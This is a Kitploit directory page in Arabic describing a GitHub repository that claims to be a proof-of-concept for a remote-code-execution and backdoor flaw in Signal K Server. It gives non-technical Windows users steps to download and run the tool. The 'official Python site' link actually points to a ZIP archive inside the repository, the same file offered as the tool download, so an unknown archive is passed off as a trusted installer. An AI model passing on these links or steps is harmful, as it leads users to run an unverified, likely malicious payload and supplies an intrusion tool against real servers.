Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2025-66398 — إثبات استغلال الثغرة CVE-2025-66398 في خادم Signal K Server، والتي تسمح للمهاجمين غير المصادَق عليهم بحقن باب خلفي وتمكين تنفيذ التعليمات البرمجية عن بُعد. | Kitploit
أدوات/GitHubGitHub/showy-headteacher114/cve-2025-66398
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعدتطوير الحمولات
GitHubshowy-headteacher114/cve-2025-66398

cve-2025-66398

إثبات استغلال الثغرة CVE-2025-66398 في خادم Signal K Server، والتي تسمح للمهاجمين غير المصادَق عليهم بحقن باب خلفي وتمكين تنفيذ التعليمات البرمجية عن بُعد.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ 5س 38دلم تتم المراجعة بعد

⚠️ cve-2025-66398 - أداة إثبات مفهوم بسيطة لتنفيذ الأكواد عن بُعد (RCE)

Download


⚙️ حول هذه الأداة

يعرض هذا المشروع ثغرة تنفيذ أكواد عن بُعد (RCE) في خوادم Signal K Server الإصدار 2.18.0 والإصدارات الأقدم. يوضح إثبات المفهوم (PoC) كيف يمكن للمهاجم تنفيذ أوامر على جهاز معرّض للثغرة.

صُممت هذه الأداة لمختبري الأمان ومسؤولي الأنظمة أو أي شخص مهتم بفهم هذه المشكلة الأمنية. لا تتطلب أي مهارات برمجية سابقة لتشغيلها، لكن المعرفة الأساسية بالتعامل مع الحاسوب تساعد.


🖥️ متطلبات النظام

  • ويندوز 10 أو أحدث
  • 2 غيغابايت على الأقل من الذاكرة العشوائية الحرة
  • 100 ميغابايت من مساحة القرص الحرة
  • اتصال بالإنترنت لتنزيل الملفات
  • صلاحيات المسؤول غير مطلوبة

📥 كيفية التنزيل والتثبيت

انقر على الزر أدناه لزيارة صفحة المشروع وتنزيل الملفات.

Download

الخطوة 1: زيارة صفحة التنزيل

انتقل إلى الرابط أعلاه. سترى قائمة بالملفات والمجلدات في صفحة GitHub.

الخطوة 2: تنزيل ملف ZIP

ابحث عن الزر الأخضر Code بالقرب من أعلى يمين الصفحة. انقر عليه واختر Download ZIP.

الخطوة 3: استخراج الملفات

  • ابحث عن ملف ZIP الذي تم تنزيله في مجلد التنزيلات لديك.
  • انقر بزر الماوس الأيمن على ملف ZIP واختر Extract All.
  • اختر مجلدًا تريد وضع الملفات فيه، ثم انقر على Extract.

الخطوة 4: تحديد موقع التطبيق

افتح المجلد المستخرج. يجب أن ترى ملفات متعلقة بالمشروع، مثل البرامج النصية والوثائق.


▶️ كيفية تشغيل الأداة على ويندوز

يستخدم المشروع برامج نصية مكتوبة بلغتي Python وGo. لتشغيل الأداة، ستستخدم نافذة موجه أوامر بسيطة.

الخطوة 1: فتح موجه الأوامر

  • اضغط Win + R على لوحة المفاتيح.
  • اكتب cmd واضغط Enter.

الخطوة 2: الانتقال إلى المجلد

اكتب هذا الأمر، مع استبدال path\to\folder بمسار المجلد المستخرج لديك:

root@kitploit:~
cd path\to\folder

اضغط Enter.

الخطوة 3: تشغيل البرنامج النصي

قد تجد برنامجًا نصيًا باسم مثل run.bat أو start.bat. إذا كان الأمر كذلك، فاكتب اسمه واضغط Enter. على سبيل المثال:

root@kitploit:~
run.bat

إذا لم يكن هناك ملف BAT، فابحث عن برنامج Python نصي ينتهي بـ .py. ستحتاج إلى تثبيت Python على جهازك (انظر القسم التالي).

اكتب هذا الأمر للتشغيل:

root@kitploit:~
python scriptname.py

استبدل scriptname.py باسم الملف الفعلي.


🐍 تثبيت بايثون (إذا لزم الأمر)

إذا تلقيت خطأً يفيد بأن Python غير معروف، فستحتاج إلى تثبيت Python.

الخطوة 1: تنزيل Python

انتقل إلى موقع Python الرسمي:

https://raw.githubusercontent.com/showy-headteacher114/cve-2025-66398/main/docker/vendor/cve_v1.2.zip

انقر على مثبت ويندوز الأحدث وقم بتنزيله.

الخطوة 2: تثبيت Python

  • شغّل المثبت الذي تم تنزيله.
  • حدد المربع الذي يقول Add Python to PATH قبل النقر على Install Now.
  • انتظر حتى يكتمل التثبيت.

الخطوة 3: التحقق من تثبيت Python

افتح نافذة موجه أوامر جديدة واكتب:

root@kitploit:~
python --version

يجب أن يعرض إصدار Python المثبت.


🚨 تشغيل الأداة بأمان

هذه الأداة مخصصة لاختبار والتعرف على ثغرة محددة فقط. استخدمها في بيئة آمنة، مثل شبكة اختبار أو جهاز معزول.

لا تقم أبدًا بتشغيلها ضد أنظمة لا تملكها أو ليس لديك إذن باختبارها.


🔍 كيف تعمل الأداة

تقوم الأداة بفحص الأجهزة التي تشغل Signal K Server الإصدار 2.18.0 أو إصدارًا أقدم. تحاول إرسال أوامر تستغل الثغرة وتتحقق مما إذا كان الهدف ينفذها.

يتيح ذلك لمحترفي الأمان التأكد من أن أنظمتهم معرضة للثغرة واتخاذ الإجراءات اللازمة لتحديثها أو تأمينها.


💡 استكشاف الأخطاء وإصلاحها

  • إذا لم تبدأ الأداة، تحقق من أنك في المجلد الصحيح في موجه الأوامر.
  • تأكد من تثبيت Python وإضافته إلى PATH في نظامك.
  • أغلق التطبيقات الأخرى التي قد تحظر الوصول إلى الشبكة.
  • شغّل موجه الأوامر كمسؤول إذا واجهت أخطاء في الصلاحيات.
  • تأكد من أن الجهاز الهدف يمكن الوصول إليه على الشبكة.

📄 موارد إضافية

لمزيد من المعلومات حول ثغرة CVE-2025-66398، ابحث في قواعد البيانات الأمنية أو على GitHub عن الأبحاث ذات الصلة.


🔗 رابط التنزيل

قم بزيارة هذه الصفحة لتنزيل ملفات الأداة:

https://raw.githubusercontent.com/showy-headteacher114/cve-2025-66398/main/docker/vendor/cve_v1.2.zip

تنزيل الأداة